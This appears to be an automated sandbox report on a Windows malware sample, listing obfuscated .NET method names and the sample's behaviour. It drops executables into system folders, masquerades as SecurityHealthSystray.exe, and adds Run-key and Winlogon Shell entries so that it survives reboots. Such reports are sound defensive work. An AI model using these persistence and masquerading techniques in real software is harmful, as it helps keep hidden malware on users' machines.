Source: VQdUvAQ4xO.exe, yys8L9wMLNW4S5TLULH.cs | High entropy of concatenated method names: 'WlUwt7UtAb', 'AJOk7vHCFsnmXa5hdGa0', 'eLCDP5HCAj3uioOJAUAD', 'qE20ktHCYwfqVlXXA3oL', 'r1JE3hHCITXAwxA2tuT5', 'xt7ct2HCyi9JA8RApdrG', 'XFfY4uHC89FknvM7Tt2Q', 'tB2iCBHCqWbEoyaKIwTC', 'nnyc3eUqBY', 'G7mpbRHCNjA8wnoCoMHy'
Source: VQdUvAQ4xO.exe, Yk59Lhnekh9RbEVxAIv.cs | High entropy of concatenated method names: 'fs0OojHim74rcXkYcsae', 'ok04WnHirC51U9UGCyCA', 'soYCtRHifN7WQtah3bmc', 'tsIndnveQ2', 'Mh9', 'method_0', 'Q6NnQtmDM4', 'xWQnGd8ot2', 'e7HnumpR5B', 'ts0n7kkDpy'
Source: VQdUvAQ4xO.exe, QvoAMswvvZU2wNwB9wZ.cs | High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'h4qHYlXZ4aE', 'h0aHwHCk5w6', 'H6GCspHJV4HK0t5ZFA4v', 'rjEU5uHJpUIEOFM1Zhro', 'NfbDXkHJJrjlEMwTVLRj'
Source: VQdUvAQ4xO.exe, U8r9Ning2j2bjiQImrN.cs | High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'rWcnMIUgES', 'zG8nrty6h6', 'L4RnfbntFw', 'yabnmO91Je', 'mKYnX0ieHh', 'CiWn5HMV9W', 'NFHxEPHisy6QnBfbnDTa'
Source: VQdUvAQ4xO.exe, yMQ3a62RdYnks5GJxd9.cs | High entropy of concatenated method names: 'D92bqiVrKA', 'v71kLyHeheQmXVTePjUy', 'kPdtVuHevhrG01EstdmB', 'KUtgetHe00lKlW5BKqrB', 'lNG3eDHeVNuU1jwLTKXk', 'kt5', 'Yb52scUoYG', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: VQdUvAQ4xO.exe, uD7SimxVhE1yEBAO8b3.cs | High entropy of concatenated method names: 'PqRxOcmxZk', 'hVXe0cHMofCbEKkhLefK', 'qyt30xHMKSnyFGU81eE9', 'JiBuneHMajq8bPHlIire', 'xkyQjBHMedAU6ghp1H8R', 'LEIxJZR4uL', 'GoKxCCqCH4', 'LDhx2yMTSf', 'QMvUomHMmO5AKNITVMWg', 'LG3JbPHMXt5DFM5A9ntc'
Source: VQdUvAQ4xO.exe, VXxCxNM70RndMdMrmq2.cs | High entropy of concatenated method names: 'LRPMtpqBlQ', 'DC3MT59oOc', 't57MzKMKch', 'AhCrB1Ycdi', 'LT8rHeA7ve', 'dfprSt61qt', 'N8prlSCQZl', 'aujrw0DrND', 'IBCrc2Xiqu', 'hffr3bjkw6'
Source: VQdUvAQ4xO.exe, Oy8Y39Uu6BNA6NVYSd9.cs | High entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'C9HUPtKhVp', 'RMhHYZ6vNSI', 'A3LK0fHfjAGioDcZbWmK', 'Hm55bvHfWPpA51wjuAai', 'nmLnKrHfDcNSOyKdhALx', 'o8wmnaHfNETQpLPYw21T', 'M41NmaHfZF86nWhRiUiU'
Source: VQdUvAQ4xO.exe, BvDSQ8EXlxDnQ607k8B.cs | High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'bLtE9cJVuU', 'zgdEK05b9T', 'Dispose', 'D31', 'wNK'
Source: VQdUvAQ4xO.exe, zQWeV6HQY6tHDY3lWGr.cs | High entropy of concatenated method names: 'P9X', 'OCQHuCPHdF', 'wHPHYBlANXQ', 'imethod_0', 'FHyH7wlZ2D', 'ajBrCuHhtBPhusMdFSVp', 'g7orL8Hh7RhwOwiGv5qd', 'yWEleDHhP3SSyQwnllEt', 'DkH2aUHhTQSKjVFJIWdF', 'eWUG86Hhz7xfNxg4tXRK'
Source: VQdUvAQ4xO.exe, TA6E6pN24XljmposSL.cs | High entropy of concatenated method names: 'HranpMISN', 'wlyniTH02ynWhD9yER8E', 'opBXXjH0JrFYBlddFM3f', 'RC9d7hH0CsptaJOwdx5b', 'IisxlH9Dm', 'dqUUdDJZc', 'MIQRRxrdw', 'LZZ6Tnb0r', 'xgmsa4R5I', 'qWt4AkoGW'
Source: VQdUvAQ4xO.exe, MCS1Ds7BqwsE4F5CPXe.cs | High entropy of concatenated method names: 'IJN7wsOw0C', 'x8b7c9TQ5D', 'e28Kw1HP0rNBlPA2M46U', 'nT42vUHPhHPUeAM0jsMw', 'L4pG9xHPEvYiMwm9Xb0r', 'nL5lo5HPvV12vF8K2sG2', 'E5kxPxHPVIGd30cqX7tN', 'AhwBpXHPpPaovr69D2ct', 'bmP7SRyVvI', 'To4d2JHPRvpUBsokNaW0'
Source: VQdUvAQ4xO.exe, bGXEJKrkJeEQ3Se3SRP.cs | High entropy of concatenated method names: 'dDkPfaHGhw8p304F195G', 'YNRmP5HGV95O38bXAVGD', 'GQfgtsHGvjaghhMbEp7k', 'XkK9OlHG0TqCmkLKdDmi', 'DOeTJ0HGsWZ7xkCh0v55', 'SR9yu3HG4V2HPAC6SSxW', 'iWJHiEHGRF7lfncd5EnE', 'uaXtTKHG6WK6HomMmqk9'
Source: VQdUvAQ4xO.exe, XFGdWoSCEJPYyIxyQSd.cs | High entropy of concatenated method names: 'd2FSfvngBV', 'qmfSmhMrQC', 'drg43iHVXLboYGXEew7V', 'Gy6CI5HVf7CmYDllyv24', 'PyIDFDHVmEVPFZ45RYIQ', 'Ah2gDYHV5Ae26RDUGtQ5', 'BBaSKbyaDC', 'bnDGR2HVoS1fNdEOsgpU', 'Rb7GOMHVKo3aMjYCYmAM', 'bZNIeFHVaWl9lbN1sZb7'
Source: VQdUvAQ4xO.exe, mmyc9j3Ems3yKC26Wo2.cs | High entropy of concatenated method names: 'Tmm3CwIaHf', 'DLali5H2mkQRhI0ECheg', 'gg1mfpH2rdPTAcF5Q59E', 'QZiRhHH2ff9n0PHrIp8p', 'QF8mwMH2XSvZppMdMkAD', 'B2gtqKH25T7Zvfbi4wEI', 'E94', 'P9X', 'vmethod_0', 'v48HwUafkTc'
Source: VQdUvAQ4xO.exe, aXlPZypCcLrKIi5yI6c.cs | High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: VQdUvAQ4xO.exe, vcKPulRcLDwIrW0WGD4.cs | High entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'LC1RAdLZvT', 'vmethod_0', 'fNkRYKG5In', 'YFlHYR2E50X', 'rBhRxwHfC6nYP9W5hqgL', 'ccW47DHfptLv7wJQe53e', 'd9KqV2HfJmnrqaVxpPqG'
Source: VQdUvAQ4xO.exe, Koet8K0ymYwxoWODX1H.cs | High entropy of concatenated method names: 'QP50IbcyRk', 'mkT0qnwxBA', 'O9Z0W4IZHh', 'QFg0DxSW88', 'mCv0j7pgr1', 'uxcY8FH5PJbaJuEw2pDD', 'R3u6jfH5uPn0WGOgVLVN', 'NqULP5H57Alrk65g2mZE', 'fDJeX2H5tpgH8CcrI8Hg', 'p2pUBOH5TnXuM3afPe8W'
                              Source: VQdUvAQ4xO.exe, bWL1i5F4yVHjNt8eQvJ.csHigh entropy of concatenated method names: 'tr54D4Hg0F51Za3jyoNI', 'VGBcY3HghSHr48mkdLHC', 'bJitZLHgV98iFdSiUuhH', 'vn0qTVt0rq', 'NYaurrHg2LciwjX18eMJ', 'QPUm3nHgJpLGLXefvXWN', 'cg49SMHgCWP6O0A1cSL6', 'f6c3gdHgbHFlQQLTXu3o', 'p77WHtayT8', 'TWkfy2Hgg0SIrCN4WJjW'
                              Source: VQdUvAQ4xO.exe, ANfuNnw23b2xZ3xGT1W.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'WEuHYwEoOcw', 'h0aHwHCk5w6', 'xAWkKtHJMa9OVxMEZ7l0', 'WQnAb7HJrtpApup3opgC', 'rbi6kSHJfEMXgIDY4TNd', 'RY1mTHHJmomV6ULl2C1F', 'k944Z3HJX1MqX7nhAixR'
                              Source: VQdUvAQ4xO.exe, gBVbQHQgiGaWKiuDiaI.csHigh entropy of concatenated method names: 'WwdHY08HK0E', 'XxwH3vQscn0', 'vgftURHuK83jLQXbOMiP', 'fy4egdHu5NtCOBEYmpDJ', 'lb8brJHu95yCobIt8aQU', 'Yf9OU6HuicXG9DicufrD', 'tvTTbIHuoIb2a34P9uvL', 'Aftx3kHuerAxxoefNtV4', 'aBlB4YHudwIJ43qNxhY3', 'imethod_0'
                              Source: VQdUvAQ4xO.exe, NWpPepprKCtKuH6lYtM.csHigh entropy of concatenated method names: 'm4NpmPCmZC', 'A3TpX6wh4R', 'Xqdp5JbZ0v', 'WuBp97v7OR', 'V1qpKE9IVD', 'HH3pa7X5nE', 'fmppoaCN6H', 'bKypeVu0Oy', 'wAGpitxe0q', 'QrQpdnmIAY'
                              Source: VQdUvAQ4xO.exe, xHUCR8ciN5vM2OeLvmt.csHigh entropy of concatenated method names: 'vX4cPkFUXm', 'mfOctJ9c6n', 'UgjcTctbga', 'LuRczPk4k6', 'qWn3BuuNsl', 'itG3H8kwy8', 'vQI3Sn3ZUt', 'gL3U4WH2DxgjyLsdabt0', 'jUwaRXH2jDqMOaFvgvb5', 'Xx0ONcH2NPYX4LCVBoO3'
                              Source: VQdUvAQ4xO.exe, fmjSfCJT49s9m6BfHv2.csHigh entropy of concatenated method names: 't3WCBb7Gsw', 'UyoCHWCTmd', 'Yd7', 'wSgCSq4yrD', 'K8vClakZ6M', 'eL4CwRJqWx', 'GOxCc9lj1U', 'yWo06ZHogvh7udGunwfN', 'zjphyIHoki39GOuaYsBa', 'CHBqGWHoO3M9jZOiT6vO'
                              Source: VQdUvAQ4xO.exe, hQW0R4RDbHP2MtS1ymu.csHigh entropy of concatenated method names: 'LJZuwjHmlyB42Kol4EGq', 'EomnEdHmwanVMbOOGbmW', 'vsIVjZHmccjf6gKLdCai', 'LkJAlYHmHG2qXI1l7Zfd', 'rFgB6QHmSCqL3UiCEFoo', 'method_0', 'method_1', 'wpLRNOAhmh', 'zguRZ5X0ua', 'Ly8RxsHvDt'
                              Source: VQdUvAQ4xO.exe, EIxq4UYjl6H5a0Fuqri.csHigh entropy of concatenated method names: 'Q3OYUugmJV', 'K26eCvHnpJfhI5YI1WcP', 'TtRxIDHnJ1f4EM52hXmY', 'w06DEqHnCalnLFTL3FV1', 'LyqYZxIkEI', 'LkKItyHnERatHg8iRTBn', 'ijnNAoHnv6dQDb71yJ92', 'i3r16EHn0KLmkTrSsTan', 'Wp8QPGHnsiZ1GBm8Lqp6', 'Pyl9k8Hn48VWMaixdal5'
                              Source: VQdUvAQ4xO.exe, BUiuY2tMlAZ7EiDbGui.csHigh entropy of concatenated method names: 'WeWH32FGBuQ', 'FmIH3bMlXjs', 'h3uH3n2adFO', 'Ug3H3klMKOZ', 'PdAH3OqX9Ve', 'x2lH3g8nu4x', 'e3hH3LVbmNO', 'bscTccPUmm', 'GBFH3MuQuJs', 'hZEH3r3K6tA'
                              Source: VQdUvAQ4xO.exe, g86dPQv4y92Sj77mE3g.csHigh entropy of concatenated method names: 'X7Uvvknuk2', 'bIfv0w9Gbc', 'GhEvhLL1pA', 'zghvVWXfu6', 'QS1vpNdlaK', 'w7i75TH5OWFM8IAjjr1U', 'FIopGUH5nhvhxRRWKP7g', 'jfaGD3H5koyEMTbcB7Kk', 'AyBac3H5gk8CCWtjGa0R', 'JCdXVsH5LU3lji0Em1MX'
                              Source: VQdUvAQ4xO.exe, iXi9h8L5ocWDEJDTgWu.csHigh entropy of concatenated method names: 'ynlHYEMc8Tc', 'rsELKctqLQ', 'oIALaUjdP6', 'Pu0Loham2r', 'QhADWbHQHYPUag2lcPlL', 'dr1e1fHQSnRliJfgYuQp', 'RnhS48HQlqpDUDuCUqtC', 'SaYKOCHQwIg40bsRnknR', 'sMmdI7HQcroRdJtx8odS', 'sDhpOTHQ39Ca6AdgxkPy'
                              Source: VQdUvAQ4xO.exe, vd3HCFvQisbOe9XgSHm.csHigh entropy of concatenated method names: 'yP0vuB8rRx', 'f2uv7iGqA6', 'Bm0vPUJ4j8', 'nSuQLZH5ogjXBd54v2eG', 'cBYVu1H5eLM5nV4TqVXZ', 'vGThmkH5ifWrfND9nB8F', 'CGXT6HH5dCly0faPsfoZ', 'J8bifNH5QOKWt4trmylT'
                              Source: VQdUvAQ4xO.exe, rWjMRehlB9OQ5LxXOjy.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'G3KhcMOejx', 'Write', 'rHjh3N2beL', 'lsThArNaRE', 'Flush', 'vl7'
                              Source: VQdUvAQ4xO.exe, X00JSaMCbyERYmsWXrA.csHigh entropy of concatenated method names: 'GQlMbQqiD7', 'uMeMneGNoy', 'yaSMk22AdQ', 'qPaMOGF47n', 'ecYMgAMtl4', 'NREMLbTtuS', 'Qc6MMWoyhM', 'QV7Mro11pV', 'DFwMfZnJoo', 'tKpMmK2qQy'
                              Source: VQdUvAQ4xO.exe, rWFTO7l0LUjBpTE7F4e.csHigh entropy of concatenated method names: 'J5Zlmxeqs8', 'uRNlXeIZjv', 'VpWl5qF4lw', 'PPd68KHpKKFZu4E6HZqs', 'x3jYCRHpaEu0w9OR6DSd', 'Dm6PaeHp5u0qlf5B9rjv', 'iRZFjLHp9JpkACs3cKsr', 'QFdlVb1IiB', 'SpslpoFGlv', 'h7ClJJsbsr'
                              Source: VQdUvAQ4xO.exe, tSYNryxQqlJ8Ze1SUAg.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'v6SHYIMYI6e', 'dE0Hw9w4osj', 'Lir66kHrYyxANlf9VUo3', 'LJ5onZHrFmfEhNsuIMW8', 'vQHAj2Hr1KXwss2Iejf2', 'HBOlUqHryIkO5J5IQW16', 'BSd2tgHr8mIZd5reOqpO'
                              Source: VQdUvAQ4xO.exe, ciXfN6tqmX8b1O3iOug.csHigh entropy of concatenated method names: 'TicScUf9WCb', 'ol8ScR5rvDG', 'UGE7LtHtDAiZT0MBXnL9', 'xFTFK1HtjNW0TNi494Mf', 'us1IBlHtNCvHDujFbUYv', 'NHdTKgHtZrf2hbPHqvYZ', 'cohBmgHtxHk2ySlsepaU'
                              Source: VQdUvAQ4xO.exe, IACyYKAfOvk31kQ3Xli.csHigh entropy of concatenated method names: 'JRcAuAUFl6', 'Tq1A7uLYkc', 'F2Y3HlHnw1cIZs9nx6Th', 'j6mFvnHncVy2QVihCgPC', 'CSIU7CHn3AnNORuEDmDf', 'YDwAXaKsTN', 'notA5dtEXO', 'EDsA9DbTfZ', 'w3kAKis9Ps', 'SyJAaiWvP4'
                              Source: VQdUvAQ4xO.exe, hQBQP3Sc0bx5PLlNgS0.csHigh entropy of concatenated method names: 'NyuSA8mB60', 'NTgSYLaLrV', 'HTsSFwa8sC', 'WeVS132i9q', 'o7ui8VHVNIRSVEoIdvmE', 'wHxN2AHVD5UuDnuCXKPT', 'sKgk0kHVjMwMg2IOc53F', 'JE0KfnHVZSCk0eERTlKN', 'ol51bMHVxw7atWdpAbDl', 'bq4rxBHVUg3dMIefyTPW'
                              Source: VQdUvAQ4xO.exe, Fj0LRYY6MSgJJstC44o.csHigh entropy of concatenated method names: 'QCuY4hPoGA', 'd6p9LcHnkVoLhD3TtMIe', 'fRqdFZHnOVId1dYDAXlp', 'Rais2BHngIiro5cPl84i', 'BcAp3NHnbtEWrLQkRC0j', 'DuHYWmHnnyKsSdrAayB4', 'EODpFsHnLo494IrStjx1'
                              Source: VQdUvAQ4xO.exe, rgDKvwJwP7ji0dDlD5J.csHigh entropy of concatenated method names: 'wvDJ3yN2Is', 'A11JApeSFt', 'gfqJYMGmYu', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'T6YJF6xIq5'
                              Source: VQdUvAQ4xO.exe, hZ9mBEJ54WNm3iWen6e.csHigh entropy of concatenated method names: 'SJuJKkAnvj', 'pjuJad9N4r', 'nO7JopuvyH', 'dfTJeR79Dr', 'xiFJiJ1Y2x', 'KlvmhpHovZtu2qlNrQLv', 'iGHwtAHo0Euj9upoOZWn', 'hSxI1RHohlosuRxqb4xy', 'fnITe4Ho4c3W9U6rS07m', 'buw1EwHoEuiJ1yqjQEq6'
                              Source: VQdUvAQ4xO.exe, J9wrnacnR8HA2262xbp.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'XbRHwyyZ8xI', 'ycDcOCYVkm', 'imethod_0', 'dZWnMSHCKGe7RfU5b9kl', 'EqjjP6HCay7W52C7Fw6m', 'yrZ8VaHConvA6hBWGoe3', 'ubWdFgHCeMPgAc2h457n'
                              Source: VQdUvAQ4xO.exe, aKohs5QCTPGPqv43Ewe.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'b4XQbgQKRA', 'OBlCF1HuZG72AJTTPPKA', 'ydI7BPHuxbIQPrCEpC6E', 'oqBwNSHuU0jKRGXR6OkO', 'PjNBg9HuRZ4AvnlbyWTZ', 'GP487wHu6VKUrD3CgTGu', 'hJ1ZoGHusMSKuU9d2A8W'
                              Source: VQdUvAQ4xO.exe, u0XmLdueBj9R9AF4QqX.csHigh entropy of concatenated method names: 'CreateFileW', 'GetFileAttributesW', 'GetFileAttributesExW', 'GetFileInformationByHandle', 'aH5udRc6YL', 'DswuQxl2hW', 'OnnuGrcGf6', 'F4UuuUI6Qm', 'RT56DrHPqD1av0UDXnkm', 'LWa1R0HP8XI8vKjLJr4b'
                              Source: VQdUvAQ4xO.exe, QkHmlS0C60SgWlaHGr4.csHigh entropy of concatenated method names: 'method_0', 'Hwx0bEVeEL', 'kns0nVprOq', 'cAu0koo0Zx', 'Lqc0O6ft3a', 'ktk0g4G5Ru', 'hFy0LTYSUv', 'q7FVXuH9cxhaUDNwf01x', 'vtdThTH93wgmrtpBwZSw', 'CkJ1g0H9Af20bVkghjNj'
                              Source: VQdUvAQ4xO.exe, d9AhtAhfG1uEY27JJ3U.csHigh entropy of concatenated method names: 'a1JhtB0PHl', 'FvQhzFFr78', 'quKhXwmqAW', 'LFEh5ZCTfX', 'hb6h9oQCX3', 'Ef3hKq6baP', 'SmahaJRvqu', 'rLxho2BpVp', 'uQZhebpx6E', 'FfbhinaffE'
                              Source: VQdUvAQ4xO.exe, QEYnNRcDaG8FKcYVH5c.csHigh entropy of concatenated method names: 'Kp2chBV7SL', 'htdcVVERZr', 'cuXcpLhqmU', 'V01OgmHCXOS2SI0S186V', 'AisgZ5HC5odJqsShmlyQ', 'mgOTkPHCfZ7CfweIOf83', 'A1niCRHCmIBBU6qxZyTr', 'TSoc4iTHIQ', 'tHecEGi9Bc', 'yKeB8QHCMhcRkuJNAf6l'
                              Source: VQdUvAQ4xO.exe, ItGJviWsGpg4pLESa9c.csHigh entropy of concatenated method names: 'lAgxIxfmh6', 'pZqxqOe4UH', 'oJiuWwHMhZvOC2RlsCca', 'tANDviHMv4CVcnbk10kM', 'JBfX23HM0yXoRu0P69ap', 'RXB5cpHMVAHBACo8yEXD', 'wT6xxEAT7c', 'SxOxvPHMJUoNRJ1vn1oI', 'SCfkhJHMCnFknnhXiHAp', 'wNJ5lUHM2SWyHsXUdkax'
                              Source: VQdUvAQ4xO.exe, BLuQioxL94kuAm3E3A2.csHigh entropy of concatenated method names: 'QP4x9g7Ee4', 'lJbxKDFT00', 'pvPxaqcm5t', 'p9wjYbHMPf8bGNth4tEK', 'gB2RZBHMtf6ouHioyB6N', 'XxPMZrHMTJ2aG4BavlIZ', 'FhaxrjueT5', 'sQgxft51qu', 'u5uxmVaiVi', 'NrdsjAHMdkDrxVWB1k6Z'
                              Source: VQdUvAQ4xO.exe, Ko9syTuCMIiR29WW3UQ.csHigh entropy of concatenated method names: 'YZPubR6T8H', 'x40unWabju', 'vaUuk3vmAd', 'bFduO9efc2', 'Dispose', 'qJL3L4H7TtMNCECkSTNV', 'uLca39H7Pa8oipN7M58p', 'jIGcdMH7tiYZes3JNa9U', 'NSpQWGH7zh6virGsjE9l', 'ymgMv9HPBRSgwAXJJjWH'
                              Source: VQdUvAQ4xO.exe, NIfxCKXiPqH0dytly9.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'QL19oQmeY'
                              Source: VQdUvAQ4xO.exe, KjovMP41XOEJkF0Mbpf.csHigh entropy of concatenated method names: 'MWs4CZx8An', 'F6648RecRK', 'VXU4INHtps', 'nKu4qp2aA7', 'D0q4WAHsyR', 'T714DuniAZ', 'swl4jeqXbd', 'p064N6sqHU', 'Kx54ZuAk2l', 'k974xQHpZE'

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe | Executable created and started: C:\Windows\System32\r6Lr6XbTWt.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\QCzpQABH.log
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Users\user\Desktop\lkEtgbYs.log
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\WWtOxrLm.log
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\eTZddqfc.log
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\CEHidmAX.log
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Users\user\Desktop\XOSeUCEW.log
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\wMeJBGvi.log
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\NslYNyvF.log
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Users\user\Desktop\dGvExiJK.log
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Users\user\Desktop\LuUydMov.log
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\hJPUkngW.log
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Users\user\Desktop\vSXJQEeZ.log
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\NClzZRhR.log
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\MGxYJULN.log
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\oiVTRNgB.log
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Windows\System32\r6Lr6XbTWt.exe
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\oGDUNCaL.log
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\nluLvNRG.log
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Recovery\0eDO5Zbs.exe
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Users\user\Desktop\UdnONotd.log
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File created: C:\Users\user\Desktop\NnjhOJZu.log
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\xkMJxvqs.log
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File created: C:\Users\user\Desktop\ezCDhkaT.log

Boot Survival

Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6Lr6XbTWt
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tNOtXAG6xwxcUNu9tjBa
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JOajDppbSkfqSPK1G9zAbH
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6Lr6XbTWt
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mENvqiIeFx
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0eDO5Zbs
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VQdUvAQ4xO
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tNOtXAG6xwxcUNu9tjBa
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tNOtXAG6xwxcUNu9tjBa
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6Lr6XbTWt
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6Lr6XbTWt
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0eDO5Zbs
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0eDO5Zbs
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mENvqiIeFx
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mENvqiIeFx
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mENvqiIeFx
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mENvqiIeFx
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JOajDppbSkfqSPK1G9zAbH
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JOajDppbSkfqSPK1G9zAbH
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VQdUvAQ4xO
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VQdUvAQ4xO
